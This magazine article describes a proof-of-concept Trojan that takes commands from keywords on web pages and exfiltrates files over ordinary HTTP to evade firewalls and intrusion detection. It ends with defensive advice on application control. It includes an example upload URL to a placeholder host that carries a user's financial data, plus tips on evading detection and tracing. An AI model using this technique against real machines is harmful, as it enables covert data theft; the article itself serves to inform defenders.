Network Computingwww.networkcomputing.com

Traditionally, Trojan programs wait for incoming connections to the compromised machine. Because the Trojan is just a regular program, it has full access to whatever a normal program can do: It can read files, delete files, access the network, upload files and so forth. You rely on an antivirus program to find and disinfect a Trojan, and use a firewall to control and contain it. On a corporate firewall, you block all the unnecessary ports (both in and out), and limit the destination of incoming connections.

On a desktop machine, you can set it up so all incoming connections are dropped. This will defeat most inbound Trojan programs, such as BackOrifice or Sub 7. But now there's a new method available that gets around port blocking and intrusion detection: Make an outbound connection to an already compromised machine using legitimate network traffic.

The idea of an outbound connection with legitimate traffic is something I came up with over the past year. I don't have any experience with network coding or Winsock programming, so for this project I was assisted by Ifeanyi Echeruo in developing a Trojan program we dubbed "Sheepshank." It took Echeruo, a graduate student in the Engineering College at Syracuse University, less than three hours to get a working prototype of Sheepshank up and running. When run, this program makes an HTTP get request to a Web server, just like Netscape Communicator or Microsoft Internet Explorer would do. The Web server returns a Web page, which has keywords in it. For example, the page may say "<html><body>clearwallpaper</body></html>." The Trojan ignores the parts that it doesn't understand, and sees the keyword clearwallpaper. Source code, precompiled binaries and example usage is available at nwc.syr.edu/~mdemaria/sheepshank.

While clearing the wallpaper may sound trivial, there are many other things you can do. For example, you can upload the contents of c:\quicken\myfinancialdata in segments by using "http://www.compromised.comp/upload.cgi?
file=myfinancialdata&payload=AAD3B4351404EE" and just have a cgi script on the compromised machine piece the chunks together. If a network analyzer is used, it all looks like normal HTTP and HTML traffic. And if you select the keywords carefully, and change some of the command strings, then intrusion-detection systems would have a very difficult time stopping it. Because this is all valid Web traffic, there's very little chance you'll want to block outbound Port 80. This technique is more traceable than most Trojans, because it requires an already compromised machine. A savvy intruder will have the messages bounce around multiple locations on the Internet to avoid being traced.

What's the solution? Well, you must go beyond port blocking and intrusion detection, and that next step is in application control. You should specify which programs on each machine are allowed to access the network. Furthermore, be sure there's a way to check application integrity, otherwise it's possible to bundle a Trojan onto an approved application. Many vendors accomplish this by doing an MD5 hash on the executable -- if the executable is modified, the hashes won't match up.